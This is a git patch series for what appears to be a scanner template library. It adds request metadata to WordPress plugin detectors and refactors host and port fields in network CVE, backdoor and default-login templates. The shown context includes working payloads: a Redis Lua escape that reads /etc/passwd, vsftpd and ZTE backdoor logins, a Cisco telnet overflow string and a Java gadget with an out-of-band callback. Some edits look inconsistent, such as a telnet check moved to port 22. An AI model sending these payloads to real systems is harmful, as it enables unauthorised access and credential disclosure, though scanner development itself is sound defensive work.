diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index 1773857e15..df2487955f 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-optimize/
   metadata:
+    max-request: 1
     plugin_namespace: wp-optimize
     wpscan: https://wpscan.com/plugin/wp-optimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index bcd1509c68..79ff01211c 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-pagenavi/
   metadata:
+    max-request: 1
     plugin_namespace: wp-pagenavi
     wpscan: https://wpscan.com/plugin/wp-pagenavi
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index c6aca20a60..23414b3d1d 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reset/
   metadata:
+    max-request: 1
     plugin_namespace: wp-reset
     wpscan: https://wpscan.com/plugin/wp-reset
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index 56dfdf4a59..fba45020e4 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reviews-plugin-for-google/
   metadata:
+    max-request: 1
     plugin_namespace: wp-reviews-plugin-for-google
     wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 810fc82cde..0178c8e9fb 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-rollback/
   metadata:
+    max-request: 1
     plugin_namespace: wp-rollback
     wpscan: https://wpscan.com/plugin/wp-rollback
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index 783d381ed8..a04ddc6003 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-sitemap-page/
   metadata:
+    max-request: 1
     plugin_namespace: wp-sitemap-page
     wpscan: https://wpscan.com/plugin/wp-sitemap-page
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index 27f6d46c2b..bc83478f06 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-smushit/
   metadata:
+    max-request: 1
     plugin_namespace: wp-smushit
     wpscan: https://wpscan.com/plugin/wp-smushit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index ab61cc0338..dedd2e23b6 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-statistics/
   metadata:
+    max-request: 1
     plugin_namespace: wp-statistics
     wpscan: https://wpscan.com/plugin/wp-statistics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 5f6fbc1f75..03cd7137a8 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-super-cache/
   metadata:
+    max-request: 1
     plugin_namespace: wp-super-cache
     wpscan: https://wpscan.com/plugin/wp-super-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index d67150d038..a68d4b7d78 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
+    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index beeba7ca69..bf9dfc3ad8 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index c225df7bfd..47911a86a5 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index aaad04cb76..1c25b6f488 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
+    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index ff750a7d2a..b36317acd8 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
+    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index f1e7595ccd..5eb35dd17e 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
+    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index 4b2769ee46..ceb2b8d600 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
+    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From 29133d5978d3be6872f56fa33a6e734c876716b9 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Sun, 17 Sep 2023 01:05:21 +0530
Subject: [PATCH 0399/1090] removed duplicate network request

---
 network/backdoor/backdoored-zte.yaml                       | 3 +--
 network/backdoor/vsftpd-backdoor.yaml                      | 3 +--
 network/cves/2001/CVE-2001-1473.yaml                       | 2 +-
 network/cves/2011/CVE-2011-2523.yaml                       | 3 ++-
 network/cves/2015/CVE-2015-3306.yaml                       | 2 +-
 network/cves/2016/CVE-2016-2004.yaml                       | 2 +-
 network/cves/2016/CVE-2016-3510.yaml                       | 2 +-
 network/cves/2017/CVE-2017-3881.yaml                       | 2 +-
 network/cves/2017/CVE-2017-5645.yaml                       | 2 +-
 network/cves/2018/CVE-2018-2893.yaml                       | 2 +-
 network/cves/2020/CVE-2020-11981.yaml                      | 2 +-
 network/cves/2020/CVE-2020-1938.yaml                       | 5 ++---
 network/cves/2020/CVE-2020-7247.yaml                       | 3 ++-
 network/cves/2021/CVE-2021-44521.yaml                      | 3 ++-
 network/cves/2022/CVE-2022-0543.yaml                       | 5 ++---
 network/cves/2022/CVE-2022-24706.yaml                      | 3 ++-
 network/cves/2023/CVE-2023-33246.yaml                      | 3 ++-
 network/default-login/ftp-anonymous-login.yaml             | 2 +-
 network/default-login/ftp-weak-credentials.yaml            | 2 +-
 network/default-login/ldap-anonymous-login.yaml            | 2 +-
 network/detection/activemq-openwire-transport-detect.yaml  | 2 +-
 network/detection/apache-activemq-detect.yaml              | 2 +-
 network/detection/axigen-mail-server-detect.yaml           | 2 +-
 network/detection/cisco-finger-detect.yaml                 | 2 +-
 network/detection/clamav-detect.yaml                       | 2 +-
 network/detection/cql-native-transport.yaml                | 2 +-
 network/detection/detect-addpac-voip-gateway.yaml          | 2 +-
 network/detection/detect-jabber-xmpp.yaml                  | 2 +-
 network/detection/dotnet-remoting-service-detect.yaml      | 2 +-
 network/detection/dropbear-cbc-ciphers.yaml                | 2 +-
 network/detection/esmtp-detect.yaml                        | 2 +-
 network/detection/expn-mail-detect.yaml                    | 2 +-
 network/detection/finger-detect.yaml                       | 2 +-
 network/detection/gnu-inetutils-ftpd-detect.yaml           | 3 +--
 network/detection/gopher-detect.yaml                       | 2 +-
 network/detection/ibm-d2b-database-server.yaml             | 2 +-
 network/detection/imap-detect.yaml                         | 2 +-
 network/detection/iplanet-imap-detect.yaml                 | 2 +-
 network/detection/microsoft-ftp-service.yaml               | 2 +-
 network/detection/mikrotik-ftp-server-detect.yaml          | 2 +-
 network/detection/mikrotik-routeros-api.yaml               | 2 +-
 network/detection/mongodb-detect.yaml                      | 2 +-
 network/detection/msmq-detect.yaml                         | 3 +--
 network/detection/mysql-detect.yaml                        | 2 +-
 network/detection/openssh-detect.yaml                      | 2 +-
 network/detection/pgsql-detect.yaml                        | 2 +-
 network/detection/pop3-detect.yaml                         | 2 +-
 network/detection/proftpd-server-detect.yaml               | 2 +-
 network/detection/rabbitmq-detect.yaml                     | 2 +-
 network/detection/rdp-detect.yaml                          | 2 +-
 network/detection/redis-detect.yaml                        | 6 ++----
 network/detection/riak-detect.yaml                         | 2 +-
 network/detection/rpcbind-portmapper-detect.yaml           | 2 +-
 network/detection/rsyncd-service-detect.yaml               | 2 +-
 network/detection/rtsp-detect.yaml                         | 2 +-
 network/detection/samba-detect.yaml                        | 3 +--
 network/detection/sap-router.yaml                          | 2 +-
 network/detection/smb-detect.yaml                          | 2 +-
 network/detection/smtp-detect.yaml                         | 3 ++-
 network/detection/sshd-dropbear-detect.yaml                | 2 +-
 network/detection/starttls-mail-detect.yaml                | 2 +-
 network/detection/teamspeak3-detect.yaml                   | 2 +-
 network/detection/telnet-detect.yaml                       | 2 +-
 network/detection/totemomail-smtp-detect.yaml              | 2 +-
 network/detection/vmware-authentication-daemon-detect.yaml | 2 +-
 network/detection/vnc-service-detect.yaml                  | 2 +-
 network/detection/xlight-ftp-service-detect.yaml           | 2 +-
 network/enumeration/beanstalk-service.yaml                 | 3 ++-
 network/enumeration/kafka-topics-list.yaml                 | 3 ++-
 network/enumeration/mongodb-info-enum.yaml                 | 2 +-
 network/enumeration/niagara-fox-info-enum.yaml             | 2 +-
 network/enumeration/psql-user-enum.yaml                    | 2 +-
 network/enumeration/smtp-commands-enum.yaml                | 2 +-
 network/enumeration/smtp/smtp-user-enum.yaml               | 2 +-
 network/exposures/cisco-smi-exposure.yaml                  | 2 +-
 network/exposures/exposed-adb.yaml                         | 2 +-
 network/exposures/exposed-dockerd.yaml                     | 2 +-
 network/exposures/exposed-redis.yaml                       | 4 +---
 network/exposures/exposed-zookeeper.yaml                   | 2 +-
 network/misconfig/apache-dubbo-unauth.yaml                 | 2 +-
 network/misconfig/apache-rocketmq-broker-unauth.yaml       | 2 +-
 network/misconfig/clamav-unauth.yaml                       | 2 +-
 network/misconfig/clickhouse-unauth.yaml                   | 2 +-
 network/misconfig/dropbear-weakalgo.yaml                   | 2 +-
 network/misconfig/dropbear-weakmac.yaml                    | 2 +-
 network/misconfig/ganglia-xml-grid-monitor.yaml            | 2 +-
 network/misconfig/memcached-stats.yaml                     | 2 +-
 network/misconfig/mongodb-unauth.yaml                      | 3 ++-
 network/misconfig/mysql-native-password.yaml               | 2 +-
 network/misconfig/printers-info-leak.yaml                  | 4 +++-
 network/misconfig/sap-router-info-leak.yaml                | 2 +-
 network/misconfig/tidb-native-password.yaml                | 2 +-
 network/misconfig/tidb-unauth.yaml                         | 2 +-
 network/misconfig/unauth-psql.yaml                         | 2 +-
 network/vulnerabilities/clockwatch-enterprise-rce.yaml     | 2 +-
 95 files changed, 109 insertions(+), 109 deletions(-)

diff --git a/network/backdoor/backdoored-zte.yaml b/network/backdoor/backdoored-zte.yaml
index 699a27b60b..d9ffb84282 100644
--- a/network/backdoor/backdoored-zte.yaml
+++ b/network/backdoor/backdoored-zte.yaml
@@ -21,8 +21,7 @@ info:
 tcp:
   - host:
       - "{{Hostname}}"
-      - "{{Host}}:23"
-
+    port: 23
     inputs:
       - data: "root\r\n"
       - data: "Zte521\r\n\r\n"
diff --git a/network/backdoor/vsftpd-backdoor.yaml b/network/backdoor/vsftpd-backdoor.yaml
index e8195a5bff..764d4921c5 100644
--- a/network/backdoor/vsftpd-backdoor.yaml
+++ b/network/backdoor/vsftpd-backdoor.yaml
@@ -21,9 +21,8 @@ tcp:
       - data: "USER anonymous\r\nPASS anonymous\r\n"
 
     host:
-      - "{{Host}}:21"
       - "{{Hostname}}"
-
+    port: 21
     matchers:
       - type: word
         words:
diff --git a/network/cves/2001/CVE-2001-1473.yaml b/network/cves/2001/CVE-2001-1473.yaml
index eceb3e855e..62af220d3f 100644
--- a/network/cves/2001/CVE-2001-1473.yaml
+++ b/network/cves/2001/CVE-2001-1473.yaml
@@ -26,7 +26,7 @@ info:
 tcp:
   - host:
       - "{{Hostname}}"
-      - "{{Host}}:22"
+    port: 22
     matchers:
       - type: word
         words:
diff --git a/network/cves/2011/CVE-2011-2523.yaml b/network/cves/2011/CVE-2011-2523.yaml
index a1c22ab8ce..4e5159ea65 100644
--- a/network/cves/2011/CVE-2011-2523.yaml
+++ b/network/cves/2011/CVE-2011-2523.yaml
@@ -32,7 +32,8 @@ variables:
   cmd: "cat /etc/passwd" # shows the the user and group names and numeric IDs
 tcp:
   - host:
-      - "{{Host}}:21"
+      - "{{Hostname}}"
+    port: 21
     inputs:
       - data: "USER letmein:)\r\nPASS please\r\n"
         read: 100
diff --git a/network/cves/2015/CVE-2015-3306.yaml b/network/cves/2015/CVE-2015-3306.yaml
index fe810d10ef..8a97fba2e3 100644
--- a/network/cves/2015/CVE-2015-3306.yaml
+++ b/network/cves/2015/CVE-2015-3306.yaml
@@ -27,7 +27,7 @@ info:
 tcp:
   - host:
       - "{{Hostname}}"
-      - "{{Host}}:21"
+    port: 21
     inputs:
       - data: "site cpfr /proc/self/cmdline\r\n"
         read: 1024
diff --git a/network/cves/2016/CVE-2016-2004.yaml b/network/cves/2016/CVE-2016-2004.yaml
index cf73fce93f..4b21aaedbf 100644
--- a/network/cves/2016/CVE-2016-2004.yaml
+++ b/network/cves/2016/CVE-2016-2004.yaml
@@ -28,7 +28,7 @@ info:
 tcp:
   - host:
       - "{{Hostname}}"
-      - "{{Host}}:5555"
+    port: 5555
     inputs:
       - data: "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900" # whoami
         type: hex
diff --git a/network/cves/2016/CVE-2016-3510.yaml b/network/cves/2016/CVE-2016-3510.yaml
index 6766b764df..e8ed87a996 100644
--- a/network/cves/2016/CVE-2016-3510.yaml
+++ b/network/cves/2016/CVE-2016-3510.yaml
@@ -33,7 +33,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:7001"
+    port: 7001
     read-size: 4
 
     matchers:
diff --git a/network/cves/2017/CVE-2017-3881.yaml b/network/cves/2017/CVE-2017-3881.yaml
index 1c75e515f5..b0515d8c77 100644
--- a/network/cves/2017/CVE-2017-3881.yaml
+++ b/network/cves/2017/CVE-2017-3881.yaml
@@ -28,7 +28,7 @@ info:
 tcp:
   - host:
       - "{{Hostname}}"
-      - "{{Host}}:23"
+    port: 22
     inputs:
       - data: "{{hex_decode('fffa240003')}}CISCO_KITS{{hex_decode('01')}}2:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA{{hex_decode('000037b4023d55dc0000999c')}}BBBB{{hex_decode('00e1a9f4')}}CCCCDDDDEEEE{{hex_decode('00067b5c023d55c8')}}FFFFGGGG{{hex_decode('006cb3a000270b94')}}HHHHIIII{{hex_decode('014acf98')}}JJJJKKKKLLLL{{hex_decode('0114e7ec')}}:15:{{hex_decode('fff0')}}"
         read: 1024
diff --git a/network/cves/2017/CVE-2017-5645.yaml b/network/cves/2017/CVE-2017-5645.yaml
index 120bcc3720..7ef472e9aa 100644
--- a/network/cves/2017/CVE-2017-5645.yaml
+++ b/network/cves/2017/CVE-2017-5645.yaml
@@ -31,7 +31,7 @@ variables:
 tcp:
   - host:
       - "{{Hostname}}"
-      - "{{Host}}:4712"
+    port: 4712
     inputs:
       - data: "{{generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex')+concat(end)}}"
     read-size: 100
diff --git a/network/cves/2018/CVE-2018-2893.yaml b/network/cves/2018/CVE-2018-2893.yaml
index 77cd966683..40da5cb75e 100644
--- a/network/cves/2018/CVE-2018-2893.yaml
+++ b/network/cves/2018/CVE-2018-2893.yaml
@@ -38,7 +38,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:7001"
+    port: 7001
 
     matchers:
       - type: word
diff --git a/network/cves/2020/CVE-2020-11981.yaml b/network/cves/2020/CVE-2020-11981.yaml
index 9144c138b2..d5951f7dc7 100644
--- a/network/cves/2020/CVE-2020-11981.yaml
+++ b/network/cves/2020/CVE-2020-11981.yaml
@@ -34,7 +34,7 @@ tcp:
         read: 1024
     host:
       - "{{Hostname}}"
-      - "{{Host}}:6379"
+    port: 6379
 
     matchers-condition: and
     matchers:
diff --git a/network/cves/2020/CVE-2020-1938.yaml b/network/cves/2020/CVE-2020-1938.yaml
index 045b9a321a..16130426c3 100644
--- a/network/cves/2020/CVE-2020-1938.yaml
+++ b/network/cves/2020/CVE-2020-1938.yaml
@@ -28,9 +28,8 @@ info:
 tcp:
   - host:
       - "{{Hostname}}"
-      - "{{Hostname}}"
-      - "{{Host}}:8009"
-      - "{{Host}}:8009"
+    port: 8009
+
     inputs:
       - data: "{{hex_decode('1234020e02020008485454502f312e310000132f6578616d706c65732f78787878782e6a73700000093132372e302e302e3100ffff00093132372e302e302e31000050000009a006000a6b6565702d616c69766500000f4163636570742d4c616e677561676500000e656e2d55532c656e3b713d302e3500a00800013000000f4163636570742d456e636f64696e67000013677a69702c206465666c6174652c207364636800000d43616368652d436f6e74726f6c0000096d61782d6167653d3000a00e00444d6f7a696c6c612f352e3020285831313b204c696e7578207838365f36343b2072763a34362e3029204765636b6f2f32303130303130312046697265666f782f34362e30000019557067726164652d496e7365637572652d52657175657374730000013100a001004a746578742f68746d6c2c6170706c69636174696f6e2f7868746d6c2b786d6c2c6170706c69636174696f6e2f786d6c3b713d302e392c696d6167652f776562702c2a2f2a3b713d302e3800a00b00093132372e302e302e31000a00216a617661782e736572766c65742e696e636c7564652e726571756573745f7572690000012f000a001f6a617661782e736572766c65742e696e636c7564652e706174685f696e666f0000102f5745422d494e462f7765622e786d6c000a00226a617661782e736572766c65742e696e636c7564652e736572766c65745f706174680000012f00ff')}}"
     read-size: 1024
diff --git a/network/cves/2020/CVE-2020-7247.yaml b/network/cves/2020/CVE-2020-7247.yaml
index 96bff3c7f6..a74985f436 100644
--- a/network/cves/2020/CVE-2020-7247.yaml
+++ b/network/cves/2020/CVE-2020-7247.yaml
@@ -28,7 +28,8 @@ info:
 tcp:
   - host:
       - "{{Hostname}}"
-      - "{{Host}}:25"
+    port: 25
+
     inputs:
       - read: 1024
 
diff --git a/network/cves/2021/CVE-2021-44521.yaml b/network/cves/2021/CVE-2021-44521.yaml
index 6bdae518ae..5b017f6a77 100644
--- a/network/cves/2021/CVE-2021-44521.yaml
+++ b/network/cves/2021/CVE-2021-44521.yaml
@@ -28,7 +28,8 @@ info:
 tcp:
   - host:
       - "{{Hostname}}"
-      - "{{Host}}:9042"
+    port: 9042
+
     inputs:
       - data: "050000000500000000"
         type: hex
diff --git a/network/cves/2022/CVE-2022-0543.yaml b/network/cves/2022/CVE-2022-0543.yaml
index 96b18d66b1..ebe5b94ebb 100644
--- a/network/cves/2022/CVE-2022-0543.yaml
+++ b/network/cves/2022/CVE-2022-0543.yaml
@@ -30,10 +30,9 @@ info:
   tags: cve,cve2022,network,redis,unauth,rce,kev
 tcp:
   - host:
-      - "{{Hostname}}"
-      - "{{Host}}:6379"
       - "tls://{Hostname}}"
-      - "tls://{{Host}}:6380"
+    port: 6380
+
     inputs:
       - data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n"
     read-size: 64
diff --git a/network/cves/2022/CVE-2022-24706.yaml b/network/cves/2022/CVE-2022-24706.yaml
index 7d05c564ec..583f7ac40b 100644
--- a/network/cves/2022/CVE-2022-24706.yaml
+++ b/network/cves/2022/CVE-2022-24706.yaml
@@ -36,7 +36,8 @@ variables:
 tcp:
   - host:
       - "{{Hostname}}"
-      - "{{Host}}:9100"
+    port: 9100
+
     inputs:
       # auth
       - data: "{{name_msg}}"
diff --git a/network/cves/2023/CVE-2023-33246.yaml b/network/cves/2023/CVE-2023-33246.yaml
index 51c2a56a98..babe5d2f4c 100644
--- a/network/cves/2023/CVE-2023-33246.yaml
+++ b/network/cves/2023/CVE-2023-33246.yaml
@@ -34,7 +34,8 @@ variables:
 tcp:
   - host:
       - "{{Hostname}}"
-      - "{{Host}}:10911"
+    port: 10911
+
     inputs:
       - data: '{{ part_a + "{{interactsh-url}}" + "/////////////" + part_b  }}'
         read: 1024
diff --git a/network/default-login/ftp-anonymous-login.yaml b/network/default-login/ftp-anonymous-login.yaml
index 3c210d02b5..552eb7830a 100644
--- a/network/default-login/ftp-anonymous-login.yaml
+++ b/network/default-login/ftp-anonymous-login.yaml
@@ -20,8 +20,8 @@ tcp:
         read: 1024
 
     host:
-      - "{{Host}}:21"
       - "{{Hostname}}"
+    port: 21
 
     matchers-condition: and
     matchers:
diff --git a/network/default-login/ftp-weak-credentials.yaml b/network/default-login/ftp-weak-credentials.yaml
index 696970bf22..06181d3b73 100644
--- a/network/default-login/ftp-weak-credentials.yaml
+++ b/network/default-login/ftp-weak-credentials.yaml
@@ -21,7 +21,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:21"
+    port: 21
 
     attack: clusterbomb
     payloads:
diff --git a/network/default-login/ldap-anonymous-login.yaml b/network/default-login/ldap-anonymous-login.yaml
index aae1a43689..c6ed3c04da 100644
--- a/network/default-login/ldap-anonymous-login.yaml
+++ b/network/default-login/ldap-anonymous-login.yaml
@@ -24,7 +24,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:389"
+    port: 389
     read-size: 1024
 
     matchers:
diff --git a/network/detection/activemq-openwire-transport-detect.yaml b/network/detection/activemq-openwire-transport-detect.yaml
index 1930969a7e..9e1b3c9164 100644
--- a/network/detection/activemq-openwire-transport-detect.yaml
+++ b/network/detection/activemq-openwire-transport-detect.yaml
@@ -18,7 +18,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:61616"
+    port: 61616
 
     matchers-condition: and
     matchers:
diff --git a/network/detection/apache-activemq-detect.yaml b/network/detection/apache-activemq-detect.yaml
index e927ea96bf..0d8842fd91 100644
--- a/network/detection/apache-activemq-detect.yaml
+++ b/network/detection/apache-activemq-detect.yaml
@@ -18,7 +18,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:61613"
+    port: 61613
 
     matchers-condition: and
     matchers:
diff --git a/network/detection/axigen-mail-server-detect.yaml b/network/detection/axigen-mail-server-detect.yaml
index 8b6bc4df23..5de2d9d507 100644
--- a/network/detection/axigen-mail-server-detect.yaml
+++ b/network/detection/axigen-mail-server-detect.yaml
@@ -19,7 +19,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:25"
+    port: 25
 
     matchers:
       - type: word
diff --git a/network/detection/cisco-finger-detect.yaml b/network/detection/cisco-finger-detect.yaml
index 64366b18e5..72d1eeea38 100644
--- a/network/detection/cisco-finger-detect.yaml
+++ b/network/detection/cisco-finger-detect.yaml
@@ -18,7 +18,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:79"
+    port: 79
 
     matchers:
       - type: word
diff --git a/network/detection/clamav-detect.yaml b/network/detection/clamav-detect.yaml
index bdf57c43b8..d310c515cf 100644
--- a/network/detection/clamav-detect.yaml
+++ b/network/detection/clamav-detect.yaml
@@ -17,7 +17,7 @@ tcp:
       - data: "VERSION"
     host:
       - "{{Hostname}}"
-      - "{{Host}}:3310"
+    port: 3310
 
     matchers:
       - type: regex
diff --git a/network/detection/cql-native-transport.yaml b/network/detection/cql-native-transport.yaml
index 0da40bade4..cf8cab548e 100644
--- a/network/detection/cql-native-transport.yaml
+++ b/network/detection/cql-native-transport.yaml
@@ -25,7 +25,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:9042"
+    port: 9042
 
     matchers:
       - type: word
diff --git a/network/detection/detect-addpac-voip-gateway.yaml b/network/detection/detect-addpac-voip-gateway.yaml
index a74286909d..59bb244d24 100644
--- a/network/detection/detect-addpac-voip-gateway.yaml
+++ b/network/detection/detect-addpac-voip-gateway.yaml
@@ -23,7 +23,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:23"
+    port: 23
 
     matchers:
       - type: word
diff --git a/network/detection/detect-jabber-xmpp.yaml b/network/detection/detect-jabber-xmpp.yaml
index 42639efe65..5dbc697df4 100644
--- a/network/detection/detect-jabber-xmpp.yaml
+++ b/network/detection/detect-jabber-xmpp.yaml
@@ -21,7 +21,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:5222"
+    port: 5222
 
     matchers:
       - type: word
diff --git a/network/detection/dotnet-remoting-service-detect.yaml b/network/detection/dotnet-remoting-service-detect.yaml
index 0e6810cbba..eecbbf3434 100644
--- a/network/detection/dotnet-remoting-service-detect.yaml
+++ b/network/detection/dotnet-remoting-service-detect.yaml
@@ -22,7 +22,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:8080"
+    port: 8080
 
     matchers-condition: and
     matchers:
diff --git a/network/detection/dropbear-cbc-ciphers.yaml b/network/detection/dropbear-cbc-ciphers.yaml
index c361c0f2d1..87bfc728d5 100644
--- a/network/detection/dropbear-cbc-ciphers.yaml
+++ b/network/detection/dropbear-cbc-ciphers.yaml
@@ -22,7 +22,7 @@ tcp:
 
     host:
       - "{{Hostname}}"
-      - "{{Host}}:22"
+    port: 22
 
     matchers:
       - type: word
diff --git a/network/detection/esmtp-detect.yaml b/network/detection/esmtp-detect.yaml
index 72b2dab40c..2aecc3c599 100644
--- a/network/detection/esmtp-detect.yaml
+++ b/network/detection/esmtp-detect.yaml
@@ -24,7 +24,7 @@ tcp:
